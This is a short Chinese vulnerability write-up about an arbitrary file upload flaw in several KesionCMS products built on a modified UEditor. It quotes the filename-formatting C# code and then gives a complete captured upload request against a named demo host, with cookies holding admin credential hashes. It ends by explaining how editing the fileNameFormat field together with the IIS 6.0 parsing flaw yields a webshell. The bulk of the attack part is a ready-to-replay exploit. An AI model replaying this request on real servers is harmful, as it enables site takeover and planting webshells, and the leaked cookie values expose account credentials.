KesionCMS多系统前台上传漏洞

KesionICMS 智能建站系统 V2.5
KesionEshop 在线商城系统 X1.0.141206
KesionIMALL 在线商城系统 V2.5
KesionEdu 网校培训系统 V2.5

由于上述系统 前台均 采用UEditor编辑器 //应该是二次开发的 造成此漏洞

/Plus/ueditor/uploader.cs

public static class NameFormater      {          public static string Format(string format, string filename)          {              if (String.IsNullOrEmpty(format))              {                  format = "{filename}{rand:6}";              }              string ext = Path.GetExtension(filename);              filename = Path.GetFileNameWithoutExtension(filename);              format = format.Replace("{filename}", filename);              format = new Regex(@"/{rand(/:?)(/d+)/}", RegexOptions.Compiled).Replace(format, new MatchEvaluator(delegate(Match match)              {                  int digit = 6;                  if (match.Groups.Count > 2)                  {                      digit = Convert.ToInt32(match.Groups[2].Value);                  }                  Random rand = new Random();                  return rand.Next((int)Math.Pow(10, digit), (int)Math.Pow(10, digit + 1)).ToString();              }));              format = format.Replace("{time}", DateTime.Now.Ticks.ToString());              format = format.Replace("{yyyy}", DateTime.Now.Year.ToString());              format = format.Replace("{yy}", (DateTime.Now.Year % 100).ToString("D2"));              format = format.Replace("{mm}", DateTime.Now.Month.ToString("D2"));              format = format.Replace("{dd}", DateTime.Now.Day.ToString("D2"));              format = format.Replace("{hh}", DateTime.Now.Hour.ToString("D2"));              format = format.Replace("{ii}", DateTime.Now.Minute.ToString("D2"));              format = format.Replace("{ss}", DateTime.Now.Second.ToString("D2"));              Regex invalidPattern = new Regex(@"[/////:/*/?/042/</>/|]");              format = invalidPattern.Replace(format, "");              return format + ext;          }      }

抓包

POST /plus/ueditor/imageUp.ashx HTTP/1.1  Host: demo.bkwy.org  Proxy-Connection: keep-alive  Content-Length: 824  Cache-Control: no-cache  Origin: http://demo.bkwy.org  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36  Content-Type: multipart/form-data; boundary=tmbtrfjfrrifujwmvskngarqwewwieuo  Accept: */*  Referer: http://demo.bkwy.org/ueditor/dialogs/image/imageUploader.swf  Accept-Encoding: gzip,deflate  Accept-Language: zh-CN,zh;q=0.8  Cookie: Admin=AdminID=76&AdminUser=admin&AdminPass=469e80d32c0559f8&UserType=1&PowerList=&DocPower=1&AdminLoginCode=; myShop=userName=iz8ez4tgy5gw; myViewRecord=userName=6jmr6hlgq7r9; ASP.NET_SessionId=wfkb2dffjuvnzauyqfpacemj; CheckCode=44T2L; User=userid=191&username=test&password=49ba59abbe56e057&RndPassword=K1P6WLJ957L2NCCPH1SX    --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="fileName"    0000.gif  --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="dir"    /UploadFiles/2015-3/76  --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="Filename"    0000.gif  --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="pictitle"    0000.gif  --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="fileNameFormat"    {time}{rand:6}                                         //这里是后缀前的时间 可以修改成随意东西除了asp asa aspx几个敏感东西    --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="upfile"; filename="0000.gif"  Content-Type: application/octet-stream    xxxxxx    --tmbtrfjfrrifujwmvskngarqwewwieuo  Content-Disposition: form-data; name="Upload"    Submit Query  --tmbtrfjfrrifujwmvskngarqwewwieuo--

修改 fileNameFormat参数里的东西 利用iis6.0上传漏洞可拿下webshell